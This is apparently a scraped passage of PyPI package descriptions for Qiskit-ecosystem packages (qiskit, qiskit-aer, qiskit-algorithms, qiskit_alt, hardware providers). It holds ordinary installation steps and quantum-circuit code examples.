define the observable to be measuredfromqiskit.quantum_infoimportSparsePauliOpoperator=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])# 3. Execute using the Estimator primitivefromqiskit.primitivesimportEstimatorestimator=Estimator()job=estimator.run(qc_example,operator,shots=1000)result=job.result()print(f\" > Expectation values:{result.values}\")Running this will give the outcome4. For fun, try to assign a value of +/- 1 to each single-qubit operator X and Y\nand see if you can achieve this outcome. (Spoiler alert: this is not possible!)Using the Qiskit-providedqiskit.primitives.Samplerandqiskit.primitives.Estimatorwill not take you very far. The power of quantum computing cannot be simulated\non classical computers and you need to use real quantum hardware to scale to larger quantum circuits. However, running a quantum\ncircuit on hardware requires rewriting them to the basis gates and connectivity of the quantum hardware.\nThe tool that does this is thetranspilerand Qiskit includes transpiler passes for synthesis, optimization, mapping, and scheduling. However, it also includes a\ndefault compiler which works very well in most examples. The following code will map the example circuit to thebasis_gates = ['cz', 'sx', 'rz']and a linear chain of qubits $0 \\rightarrow 1 \\rightarrow 2$ with thecoupling_map =[[0, 1], [1, 2]].fromqiskitimporttranspileqc_transpiled=transpile(qc_example,basis_gates=['cz','sx','rz'],coupling_map=[[0,1],[1,2]],optimization_level=3)Executing your code on real quantum hardwareQiskit provides an abstraction layer that lets users run quantum circuits on hardware from any vendor that provides a compatible interface.\nThe best way to use Qiskit is with a runtime environment that provides optimized implementations ofsamplerandestimatorfor a given hardware platform. This runtime may involve using pre- and post-processing, such as optimized transpiler passes with error suppression, error mitigation, and, eventually, error correction built in. A runtime implementsqiskit.primitives.BaseSamplerandqiskit.primitives.BaseEstimatorinterfaces. For example,\nsome packages that provide implementations of a runtime primitive implementation are:https://github.com/Qiskit/qiskit-ibm-runtimeQiskit also provides a lower-level abstract interface for describing quantum backends. This interface, located inqiskit.providers, defines an abstractBackendV2class that providers can implement to represent their\nhardware or simulators to Qiskit. The backend class includes a common interface for executing circuits on the backends; however, in this interface each provider may perform different types of pre- and post-processing and return outcomes that are vendor-defined. Some examples of published provider packages that interface with real hardware are:https://github.com/Qiskit/qiskit-ibm-providerhttps://github.com/qiskit-community/qiskit-ionqhttps://github.com/qiskit-community/qiskit-aqt-providerhttps://github.com/qiskit-community/qiskit-braket-providerhttps://github.com/qiskit-community/qiskit-quantinuum-providerhttps://github.com/rigetti/qiskit-rigettiYou can refer to the documentation of these packages for further instructions\non how to get access and use these systems.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines. By participating, you are expected to uphold ourcode of conduct.We useGitHub issuesfor tracking requests and bugs. 
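To tie together the transpilation step and the common BackendV2 run() interface described above, here is a minimal, hedged sketch; qiskit-aer's AerSimulator is used purely as a stand-in for any BackendV2-compatible backend, and the circuit, shot count, and backend choice are illustrative assumptions rather than anything prescribed by the text above.

from qiskit import QuantumCircuit, transpile
from qiskit_aer import AerSimulator  # stand-in for any BackendV2-compatible backend

# Build a small GHZ-style circuit with measurements attached
qc = QuantumCircuit(3)
qc.h(0)
qc.cx(0, 1)
qc.cx(0, 2)
qc.measure_all()

# Transpile for the chosen backend, then execute through the common run() interface
backend = AerSimulator()
tqc = transpile(qc, backend=backend, optimization_level=3)
job = backend.run(tqc, shots=1024)
print(job.result().get_counts())

The same transpile-then-run pattern carries over when the backend object comes from one of the hardware provider packages listed above, subject to whatever vendor-specific pre- and post-processing those providers perform.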
Pleasejoin the Qiskit Slack communityfor discussion, comments, and questions.\nFor questions related to running or using Qiskit,Stack Overflow has aqiskit.\nFor questions on quantum computing with Qiskit, use theqiskittag in theQuantum Computing Stack Exchange(please, read first theguidelines on how to askin that forum).Authors and CitationQiskit is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.Changelog and Release NotesThe changelog for a particular release is dynamically generated and gets\nwritten to the release page on Github for each release. For example, you can\nfind the page for the0.46.0release here:https://github.com/Qiskit/qiskit/releases/tag/0.46.0The changelog for the current release can be found in the releases tab:The changelog provides a quick overview of notable changes for a given\nrelease.Additionally, as part of each release, detailed release notes are written to\ndocument in detail what has changed as part of a release. This includes any\ndocumentation on potential breaking changes on upgrade and new features. Seeall release notes here.AcknowledgementsWe acknowledge partial support for Qiskit development from the DOE Office of Science National Quantum Information Science Research Centers, Co-design Center for Quantum Advantage (C2QA) under contract number DE-SC0012704.LicenseApache License 2.0"} +{"package": "qiskit2quafu", "pacakge-description": "IntroductionThis package converts the circuit of qiskit into a circuit supported by quafu.\nThe converted circuit can be input to the cloud platform for processing.\nTo upload the task, refer tohttps://scq-cloud.github.io/In addition, it also supports Hamilton measurement and Variational optimizationTurtorialThe package provides different examples that cover various functions within the package\nThe example is located in the tutorial folder:FileFunctionqiskit2quafu.ipynbQuafu circuit conversion functionhamiltonTest.ipynbHamilton measurementhamiltonOptimization.ipynbHamilton variational optimization"} +{"package": "qiskit-addon-jku", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-aer", "pacakge-description": "Aer - high performance quantum circuit simulation for QiskitAeris a high performance simulator for quantum circuits written in Qiskit, that includes realistic noise models.InstallationWe encourage installing Aer via the pip tool (a python package manager):pipinstallqiskit-aerPip will handle all dependencies automatically for us, and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Installing GPU supportIn order to install and run the GPU supported simulators on Linux, you need CUDA\u00ae 11.2 or newer previously installed.\nCUDA\u00ae itself would require a set of specific GPU drivers. Please follow CUDA\u00ae installation procedure in the NVIDIA\u00aeweb.If you want to install our GPU supported simulators, you have to install this other package:pipinstallqiskit-aer-gpuThe package above is for CUDA® 12, so if your system has CUDA\u00ae 11 installed, install separate package:pipinstallqiskit-aer-gpu-cu11This will overwrite your currentqiskit-aerpackage installation giving you\nthe same functionality found in the canonicalqiskit-aerpackage, plus the\nability to run the GPU supported simulators: statevector, density matrix, and unitary.Note: This package is only available on x86_64 Linux. 
For other platforms\nthat have CUDA support, you will have to build from source. You can refer to\nthecontributing guidefor instructions on doing this.Simulating your first Qiskit circuit with AerNow that you have Aer installed, you can start simulating quantum circuits with noise. Here is a basic example:$ pythonimportqiskitfromqiskit_aerimportAerSimulatorfromqiskit_ibm_runtimeimportQiskitRuntimeService# Generate 3-qubit GHZ statecirc=qiskit.QuantumCircuit(3)circ.h(0)circ.cx(0,1)circ.cx(1,2)circ.measure_all()# Construct an ideal simulatoraersim=AerSimulator()# Perform an ideal simulationresult_ideal=aersim.run(circ).result()counts_ideal=result_ideal.get_counts(0)print('Counts(ideal):',counts_ideal)# Counts(ideal): {'000': 493, '111': 531}# Construct a simulator using a noise model# from a real backend.provider=QiskitRuntimeService()backend=provider.get_backend(\"ibm_kyoto\")aersim_backend=AerSimulator.from_backend(backend)# Perform noisy simulationresult_noise=aersim_backend.run(circ).result()counts_noise=result_noise.get_counts(0)print('Counts(noise):',counts_noise)# Counts(noise): {'101': 16, '110': 48, '100': 7, '001': 31, '010': 7, '000': 464, '011': 15, '111': 436}Contribution GuidelinesIf you'd like to contribute to Aer, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum, we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from theAer documentation.Authors and CitationAer is the work ofmany peoplewho contribute to the project at different levels.\nIf you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-aer-gpu", "pacakge-description": "Aer - high performance quantum circuit simulation for QiskitAeris a high performance simulator for quantum circuits written in Qiskit, that includes realistic noise models.InstallationWe encourage installing Aer via the pip tool (a python package manager):pipinstallqiskit-aerPip will handle all dependencies automatically for us, and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Installing GPU supportIn order to install and run the GPU supported simulators on Linux, you need CUDA\u00ae 11.2 or newer previously installed.\nCUDA\u00ae itself would require a set of specific GPU drivers. Please follow CUDA\u00ae installation procedure in the NVIDIA\u00aeweb.If you want to install our GPU supported simulators, you have to install this other package:pipinstallqiskit-aer-gpuThe package above is for CUDA® 12, so if your system has CUDA\u00ae 11 installed, install separate package:pipinstallqiskit-aer-gpu-cu11This will overwrite your currentqiskit-aerpackage installation giving you\nthe same functionality found in the canonicalqiskit-aerpackage, plus the\nability to run the GPU supported simulators: statevector, density matrix, and unitary.Note: This package is only available on x86_64 Linux. For other platforms\nthat have CUDA support, you will have to build from source. 
You can refer to\nthecontributing guidefor instructions on doing this.Simulating your first Qiskit circuit with AerNow that you have Aer installed, you can start simulating quantum circuits with noise. Here is a basic example:$ pythonimportqiskitfromqiskit_aerimportAerSimulatorfromqiskit_ibm_runtimeimportQiskitRuntimeService# Generate 3-qubit GHZ statecirc=qiskit.QuantumCircuit(3)circ.h(0)circ.cx(0,1)circ.cx(1,2)circ.measure_all()# Construct an ideal simulatoraersim=AerSimulator()# Perform an ideal simulationresult_ideal=aersim.run(circ).result()counts_ideal=result_ideal.get_counts(0)print('Counts(ideal):',counts_ideal)# Counts(ideal): {'000': 493, '111': 531}# Construct a simulator using a noise model# from a real backend.provider=QiskitRuntimeService()backend=provider.get_backend(\"ibm_kyoto\")aersim_backend=AerSimulator.from_backend(backend)# Perform noisy simulationresult_noise=aersim_backend.run(circ).result()counts_noise=result_noise.get_counts(0)print('Counts(noise):',counts_noise)# Counts(noise): {'101': 16, '110': 48, '100': 7, '001': 31, '010': 7, '000': 464, '011': 15, '111': 436}Contribution GuidelinesIf you'd like to contribute to Aer, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum, we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from theAer documentation.Authors and CitationAer is the work ofmany peoplewho contribute to the project at different levels.\nIf you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-aer-gpu-cu11", "pacakge-description": "Aer - high performance quantum circuit simulation for QiskitAeris a high performance simulator for quantum circuits written in Qiskit, that includes realistic noise models.InstallationWe encourage installing Aer via the pip tool (a python package manager):pipinstallqiskit-aerPip will handle all dependencies automatically for us, and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Installing GPU supportIn order to install and run the GPU supported simulators on Linux, you need CUDA\u00ae 11.2 or newer previously installed.\nCUDA\u00ae itself would require a set of specific GPU drivers. Please follow CUDA\u00ae installation procedure in the NVIDIA\u00aeweb.If you want to install our GPU supported simulators, you have to install this other package:pipinstallqiskit-aer-gpuThe package above is for CUDA® 12, so if your system has CUDA\u00ae 11 installed, install separate package:pipinstallqiskit-aer-gpu-cu11This will overwrite your currentqiskit-aerpackage installation giving you\nthe same functionality found in the canonicalqiskit-aerpackage, plus the\nability to run the GPU supported simulators: statevector, density matrix, and unitary.Note: This package is only available on x86_64 Linux. For other platforms\nthat have CUDA support, you will have to build from source. You can refer to\nthecontributing guidefor instructions on doing this.Simulating your first Qiskit circuit with AerNow that you have Aer installed, you can start simulating quantum circuits with noise. 
Here is a basic example:$ pythonimportqiskitfromqiskit_aerimportAerSimulatorfromqiskit_ibm_runtimeimportQiskitRuntimeService# Generate 3-qubit GHZ statecirc=qiskit.QuantumCircuit(3)circ.h(0)circ.cx(0,1)circ.cx(1,2)circ.measure_all()# Construct an ideal simulatoraersim=AerSimulator()# Perform an ideal simulationresult_ideal=aersim.run(circ).result()counts_ideal=result_ideal.get_counts(0)print('Counts(ideal):',counts_ideal)# Counts(ideal): {'000': 493, '111': 531}# Construct a simulator using a noise model# from a real backend.provider=QiskitRuntimeService()backend=provider.get_backend(\"ibm_kyoto\")aersim_backend=AerSimulator.from_backend(backend)# Perform noisy simulationresult_noise=aersim_backend.run(circ).result()counts_noise=result_noise.get_counts(0)print('Counts(noise):',counts_noise)# Counts(noise): {'101': 16, '110': 48, '100': 7, '001': 31, '010': 7, '000': 464, '011': 15, '111': 436}Contribution GuidelinesIf you'd like to contribute to Aer, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum, we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from theAer documentation.Authors and CitationAer is the work ofmany peoplewho contribute to the project at different levels.\nIf you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-algorithms", "pacakge-description": "Qiskit AlgorithmsInstallationWe encourage installing Qiskit Algorithms via the pip tool (a python package manager).pipinstallqiskit-algorithmspipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Algorithms, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsSome optimization algorithms require specific libraries to be run:Scikit-quant, may be installed using the commandpip install scikit-quant.SnobFit, may be installed using the commandpip install SQSnobFit.NLOpt, may be installed using the commandpip install nlopt.Contribution GuidelinesIf you'd like to contribute to Qiskit Algorithms, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. 
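To show how the pieces named above fit together, here is a minimal, hedged sketch of running VQE from this package with one of its bundled optimizers. The observable, the ansatz, and the choice of VQE with COBYLA are illustrative assumptions, not anything prescribed by the text above; COBYLA ships with the package, so none of the optional Scikit-quant/SnobFit/NLOpt installs mentioned earlier are required for it.

from qiskit.circuit.library import TwoLocal
from qiskit.primitives import Estimator
from qiskit.quantum_info import SparsePauliOp
from qiskit_algorithms import VQE
from qiskit_algorithms.optimizers import COBYLA

# Toy two-qubit observable and a hardware-efficient ansatz (illustrative choices)
observable = SparsePauliOp.from_list([("ZZ", 1.0), ("XI", 0.5)])
ansatz = TwoLocal(2, rotation_blocks="ry", entanglement_blocks="cz", reps=1)

# VQE driven by the reference Estimator primitive and the COBYLA optimizer
vqe = VQE(estimator=Estimator(), ansatz=ansatz, optimizer=COBYLA(maxiter=100))
result = vqe.compute_minimum_eigenvalue(operator=observable)
print(result.eigenvalue)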
Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationQiskit Algorithms was inspired, authored and brought about by the collective work of a team of researchers.\nAlgorithms continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskit-alice-bob-provider", "pacakge-description": "Alice & Bob Qiskit providerThis project contains a provider that allows access toAlice & BobQPUs and emulators using\nthe Qiskit framework.Full documentationis available hereand sample notebooks using the providerare available here.InstallationYou can install the provider usingpip:pipinstallqiskit-alice-bob-providerpipwill handle installing all the python dependencies automatically and you\nwill always install the latest (and well-tested) version.Remote execution on Alice & Bob QPUs: use your API keyTo obtain an API key, pleasecontact Alice & Bob.You can initialize the Alice & Bob remote provider using your API key\nlocally with:fromqiskit_alice_bob_providerimportAliceBobRemoteProviderab=AliceBobRemoteProvider('MY_API_KEY')WhereMY_API_KEYis your API key to the Alice & Bob API.print(ab.backends())backend=ab.get_backend('EMU:1Q:LESCANNE_2020')The backend can then be used like a regular Qiskit backend:fromqiskitimportQuantumCircuit,executec=QuantumCircuit(1,2)c.initialize('+',0)c.measure_x(0,0)c.measure(0,1)job=execute(c,backend)res=job.result()print(res.get_counts())Local emulation of cat quit processorsThis project contains multiple emulators of multi cat qubit processors.fromqiskit_alice_bob_providerimportAliceBobLocalProviderfromqiskitimportQuantumCircuit,execute,transpileprovider=AliceBobLocalProvider()print(provider.backends())# EMU:6Q:PHYSICAL_CATS, EMU:40Q:PHYSICAL_CATS, EMU:1Q:LESCANNE_2020TheEMU:nQ:PHYSICAL_CATSbackends are theoretical models of quantum processors made\nup of physical cat qubits.\nThey can be used to study the properties of error correction codes implemented\nwith physical cat qubits, for different hardware performance levels\n(see the parameters of classPhysicalCatProcessor).TheEMU:1Q:LESCANNE_2020backend is an interpolated model simulating the processor\nused in theseminal paperby Rapha\u00ebl\nLescanne in 2020.\nThis interpolated model is configured to act as a digital twin of the cat qubit\nused in this paper.\nIt does not represent the current performance of Alice & Bob's cat qubits.The example below schedules and simulates a Bell state preparation circuit on\naEMU:6Q:PHYSICAL_CATSprocessor, for different values of parametersaverage_nb_photonsandkappa_2.fromqiskit_alice_bob_providerimportAliceBobLocalProviderfromqiskitimportQuantumCircuit,execute,transpileprovider=AliceBobLocalProvider()circ=QuantumCircuit(2,2)circ.initialize('0+')circ.cx(0,1)circ.measure(0,0)circ.measure(1,1)# Default 6-qubit QPU with the ratio of memory dissipation rates set to# k1/k2=1e-5 and cat size, average_nb_photons, set to 16.backend=provider.get_backend('EMU:6Q:PHYSICAL_CATS')print(transpile(circ,backend).draw())# *Displays a timed and scheduled circuit*print(execute(circ,backend,shots=100000).result().get_counts())# {'11': 49823, '00': 50177}# Changing the cat size from 16 (default) to 4 and k1/k2 to 
1e-2.backend=provider.get_backend('EMU:6Q:PHYSICAL_CATS',average_nb_photons=4,kappa_2=1e4)print(execute(circ,backend,shots=100000).result().get_counts())# {'01': 557, '11': 49422, '10': 596, '00': 49425}"} +{"package": "qiskit-alt", "pacakge-description": "qiskit_altqiskit_altThis Python package uses a backend written in Julia to implement high performance features for\nstandard Qiskit. This package is a proof of concept with little high-level code.Installing and managing Julia and its packages is automated. So you don't need to learn anything about Julia\nto get started.Table of contentsInstallation and configuration notesCompilationCompiling a system image to eliminate compilation at run time.Using qiskit_altFirst steps.Manual StepsDetails of automatic installation.IntroductionMotivationsDemonstrationZapata demo of Jordan-Wigner transformation in Julia; The\nsame thing as the main demonstration in qiskit_alt.Julia PackagesJulia packages that qiskit_alt depends on.TroubleshootingDevelopment. Instructions for developing qiskit_alt.Installation and Configuration NotesBasicqiskit_altis available on pypishell>pipinstallqiskit_altComplete installation by runningimportqiskit_altqiskit_alt.project.ensure_init()Seejulia_projectfor more options.If no Julia executable is found,jill.pywill be used to download and install it. It isnotnecessary\nto add the installation path or symlink path to your search PATH to use julia from qiskit_alt.\nBefore offering to install Julia,qiskit_altwill search for julia asdescribed here.The Julia packages are installed the first time you runqiskit_alt.project.ensure_init()from Python. If this fails,\nsee the log file qiskit_alt.log. You can open a bug report in theqiskit_altrepoCheck that the installation is not completely broken by running benchmark scripts, with the string \"alt\" in the name:python./bench/run_all_bench.pyNote that the folderbenchis not included when you install viapip install qiskit_alt.\nBut it can bedownloaded here.More installation detailsqiskit_altdepends onpyjuliaand/orjuliacallfor communication between Julia and Python.pyjuliaandjuliacallare two packages for communication between Python and Julia. You only need\nto import one of them. But, you won't import them directly.When you initialize withqiskit_alt.project.ensure_init()the default communication package is chosen.\nYou can also choose explicitly withqiskit_alt.project.ensure_init(calljula=\"pyjulia\")orqiskit_alt.project.ensure_init(calljula=\"juliacall\")The installation is interactive. How to do a non-interactive installation with environment variables is\ndescribed below.You may allowqiskit_altto download and install Julia for you, usingjill.py.\nOtherwise you can follow instructions forinstalling Julia with an installation tool.We recommend using a virtual Python environment withvenvorconda. For examplepython -m venv ./env,\nwhich creates a virtual environment for python packages needed to runqiskit_alt.\nYou can use whatever name you like in place of the directory./env.Activate the environment using the file required for your shell. For examplesource ./env/bin/activateforvenvand bash.Installqiskit_altwithpip install qiskit_alt.Install whatever other packages you want. For examplepip install ipython.Configuring installation with environment variables. If you set these environment variables, you will not be prompted\nduring installation.SetQISKIT_ALT_JULIA_PATHto the path to a Julia executable (in a Julia installation). 
This variable takes\nprecedence over other methods of specifying the path to the executable.SetQISKIT_ALT_INSTALL_JULIAtoyornto confirm or disallow installing julia viajill.py.SetQISKIT_ALT_COMPILEtoyornto confirm or disallow compiling a system image after installing Julia packagesSetQISKIT_ALT_DEPOTtoyornto force using or not using a Julia \"depot\" specific to this project.qiskit_alt.project.update()will deleteManifest.tomlfiles; upgrade packages; rebuild the manifest; delete compiled system images.\nIf you callupdate()while running a compiled system image, you should exit Python and start again before compilingqiskit_alt.projectis an instance ofJuliaProjectfrom the packagejulia_project.\nfor managing Julia dependencies in Python projects. See more options atjulia_project.CompilationWe highly recommend compiling a system image forqiskit_altto speed up loading and reduce delays due to just-in-time compilation.\nYou will be prompted to install when installing or upgrading. Compilation may also be done at any time as follows.[1]:importqiskit_altIn[2]:qiskit_alt.project.ensure_init(use_sys_image=False)In[3]:qiskit_alt.project.compile()Compilation takes about four minutes. The new Julia system image will be found the next time you importqiskit_alt.\nNote that we disabled possibly loading a previously-compiled system image before compiling a new one.\nThis avoids some possible stability issues.Using qiskit_altThis is a very brief introduction.Thepyjuliainterface is exposed via thejuliamodule. Thejuliacallmodule is calledjuliacall.\nHowever you shouldnotdoimport juliaorimport juliacallbeforeimport qiskit_alt,\nandqiskit_alt.project.ensure_init()(orqiskit_alt.project.ensure_init(calljulia=\"pyjulia\")orjuliacallwithqiskit_alt.project.ensure_init(calljulia=\"juliacall\"))\nThis is becauseimport juliawill circumvent the facilities described above for choosing the julia executable and the\ncompiled system image.Julia modules are loaded like this. Note thatqiskit_alt.project.juliapoints to eitherjuliaorjuliacalldepending\non which was chosen.importqiskit_altqiskit_alt.project.ensure_init(calljulia=interface_choice)Main=qiskit_alt.project.julia.Mainimport qiskit_alt;import julia;from julia import PkgName.\nAfter this, all functions and symbols inPkgNameare available.\nYou can do, for exampleIn[1]:importqiskit_altIn[2]:qiskit_alt.project.ensure_init()In[3]:julia=qiskit_alt.project.juliaIn[4]:julia.Main.cosd(90)Out[4]:0.0In[5]:QuantumOps=qiskit_alt.project.simple_import(\"QuantumOps\")In[6]:pauli_sum=QuantumOps.rand_op_sum(QuantumOps.Pauli,3,4);pauli_sumOut[6]:In the last example above,PauliSumis a Julia object. 
ThePauliSumcan be converted to\na QiskitSparsePauliOplike this.In[7]:fromqiskit_alt.pauli_operatorsimportPauliSum_to_SparsePauliOpIn[8]:PauliSum_to_SparsePauliOp(pauli_sum)Out[8]:SparsePauliOp(['ZII','IYX','XIY','ZIZ'],coeffs=[1.+0.j,1.+0.j,1.+0.j,1.+0.j])IntroductionThe highlights thus far are inbenchmark code, which is\npresented in the demonstration notebooks.\nThere is onedemonstration notebook usingpyjuliaand anotherdemonstration notebook usingjuliacall.The main application-level demonstration is computing a qubit Hamiltonian as aqiskit.quantum_info.SparsePauliOpfrom a Python list specifiying the molecule geometry in the same format as that used byqiskit_nature.The Jordan-Wigner transform in qiskit_alt is 30 or so times faster than in qiskit-nature.Computing a Fermionic Hamiltonian from pyscf integrals is several times faster, with the factor increasing\nwith the problem size.Converting an operator from the computational basis, as a numpy matrix, to the Pauli basis, as aqiskit.quantum_info.SparsePauliOp,\nis many times faster with the factor increasing rapidly in the number of qubits.You might want to skip toinstallation instructionsDemonstrationThere are a few demos in thisdemonstration benchmark notebookThebenchmark codeis a good place to get an idea of what qiskit_alt can do.Here aresome demonstration notebooksof the Julia packages behindqiskit_alt.Zapata demo of Jordan-Wigner transformation in Julia; The\nsame thing as the main demonstration in qiskit_alt. This is from JuliaCon 2020.Managing Julia packagesAvailable Julia modules are those in the standard library and those listed inProject.toml.\nYou can add more packages (and record them inProject.toml) by doingqiskit_alt.project.julia.Pkg.add(\"PackageName\").\nYou can also do the same by avoiding Python and using the julia cli.Julia PackagesThe Julia reposQuantumOps.jlandElectronicStructure.jlandQiskitQuantumInfo.jlare not registered in the General Registry, but rather inQuantumRegistrywhich contains just\na handful of packages for this project.TestingThe test folder is mostly out of date.Testing installation with dockerSeethe readme."} +{"package": "qiskit-aqt-provider", "pacakge-description": "Qiskit AQT ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toAQTion-trap quantum computing\nsystems.UsageSee thedocumentationand theexamples."} +{"package": "qiskit-aqt-provider-internal", "pacakge-description": "Qiskit AQT ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toAQTion-trap quantum computing\nsystems.UsageSee theuser guideand theexamples.LicenseApache License 2.0"} +{"package": "qiskit-aqt-provider-rc", "pacakge-description": "Qiskit AQT ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toAQTion-trap quantum computing\nsystems.UsageSee theuser guideand theexamples."} +{"package": "qiskit-aqua", "pacakge-description": "Qiskit Aquais an extensible,\nmodular, open-source library of quantum computing algorithms.\nResearchers can experiment with Aqua algorithms, on near-term quantum devices and simulators,\nand can also get involved by contributing new algorithms and algorithm-supporting objects,\nsuch as optimizers and 
variational forms.\nQiskit Aqua also contains application domain support in the form of the chemistry, finance,\nmachine learning and optimization modules to experiment with real-world applications to quantum computing."} +{"package": "qiskit-aqua-interfaces", "pacakge-description": "Qiskit Aqua Interfaces, a set of user-interface components forQiskit Aqua."} +{"package": "qiskit-aws-braket-provider", "pacakge-description": "IBM's qiskit provider for AWS Braket (qiskit-aws-braket-provider)Attention: this is a work-in-progess implementation.What this means: it basically works. But:edge cases are not coveredeven broad cases aren't entirely covered!!in code documentation is not threno usage or API documentation existsCI/CD is not setupSo: use at your own risk.ContributingWe welcome contributions - simply fork the repository of this plugin, and then make a pull request containing your contribution. All contributers to this plugin will be listed as authors on the releases.We also encourage bug reports, suggestions for new features and enhancements!AuthorsCarsten BlankSupportSource Code:https://github.com/carstenblank/qiskit-aws-braket-providerIssue Tracker:https://github.com/carstenblank/qiskit-aws-braket-provider/issuesIf you are having issues, please let us know by posting the issue on our Github issue tracker.LicenseThe qiskit-aws-braket-provider is free and open source, released under the Apache License, Version 2.0."} +{"package": "qiskit-bip-mapper", "pacakge-description": "Qiskit BIPMapping PluginThis repository contains a standalone routing stage to use theBIPMappingrouting pass. The BIP mapping pass solves theroutingandlayoutproblems as a binary integer programming (BIP) problem. The algorithm used\nin this pass is described in:G. Nannicini et al. \"Optimal qubit assignment and routing via integer programming.\"arXiv:2106.06446This plugin depends onCPLEXto solve the BIP problem. While a no-cost version of CPLEX is available (and published onPyPI) this has limits set on the size of the problems\nit can solve which prevents it from being used except for very small quantum circuits. If\nyou would like to use this transpiler pass for larger circuits a CPLEX license will be\nrequired.Install and Use pluginTo use the unitary synthesis plugin first install qiskit terra with the pull\nrequest:pipinstallqiskit-bip-mapperTo install the plugin package. As part of the install processpipwill install\nthe no-cost version of CPLEX from PyPI automatically. However, if you're going to\nuse the qiskit-bip-mapper plugin for runningtranspile()on circuits more than\na couple qubits or with more than handful of 2 qubit gates you will likely need\nto install the commercial version of CPLEX.Using BIPMapping passOnce you have the plugin package installed you can use the plugin via therouting_method=\"bip\"argument on Qiskit'stranspile()function. For example,\nif you wanted to use theBIPMappingmethod to compile a 15 qubit quantum\nvolume circuit for a backend you would do something like:fromqiskitimporttranspilefromqiskit.circuit.libraryimportQuantumVolumefromqiskit.providers.fake_providerimportFakePragueqc=QuantumVolume(15)qc.measure_all()backend=FakePrague()transpile(qc,backend,routing_method=\"bip\")Authors and CitationThe qiskit-bip-mapper is the work ofmany peoplewho contribute to the project at different levels. 
Additionally, the plugin was\noriginally developed as part of the Qiskit project itself and you can see the\ndevelopment history for it here:https://github.com/Qiskit/qiskit-terra/commits/0.23.3/qiskit/transpiler/passes/routing/bip_mapping.pyhttps://github.com/Qiskit/qiskit-terra/commits/0.23.3/qiskit/transpiler/passes/routing/algorithms/bip_model.pyIf you useqiskit-bip-mapperin your research, please cite our paper as per the includedBibTeX filefile."} +{"package": "qiskit-braket-provider", "pacakge-description": "Qiskit-Braket providerQiskit-Braket provider to execute Qiskit programs on AWS quantum computing hardware devices through Amazon Braket.Table of ContentsFor UsersInstallationQuickstart GuideTutorialsHow-TosHow to Give FeedbackContribution GuidelinesReferences and AcknowledgementsLicenseFor Developers/ContributorsContribution GuideHow to Give FeedbackWe encourage your feedback! You can share your thoughts with us by:Opening an issuein the repositoryContribution GuidelinesFor information on how to contribute to this project, please take a look at ourcontribution guidelines.References and Acknowledgements[1] Qiskithttps://www.ibm.com/quantum/qiskit[2] Amazon Braket Python SDKhttps://github.com/aws/amazon-braket-sdk-pythonLicenseApache License 2.0"} +{"package": "qiskit-chemistry", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-classroom", "pacakge-description": "Qiskit-ClassroomQiskit-classroom is a toolkit that helps implement quantum algorithms by converting and visualizing different expressions used in the Qiskit ecosystem using Qiskit-classroom-converter. The following three transformations are supportedQuantum Circuit to Dirac notationQuantum Circuit to MatrixMatrix to Quantum CircuitGetting StartedPrerequisitesLaTeX's distribution(or program) must be installedOn GNU/Linux recommend TeX LiveOn Windows recommend MiKTeXgit should be installedpython must be installed (3.9 <= X <= 3.11)Qt6(>= 6.0.x) must be installedInstall with Flatpak (GNU/Linux)We're currently packaging flatpak package. 
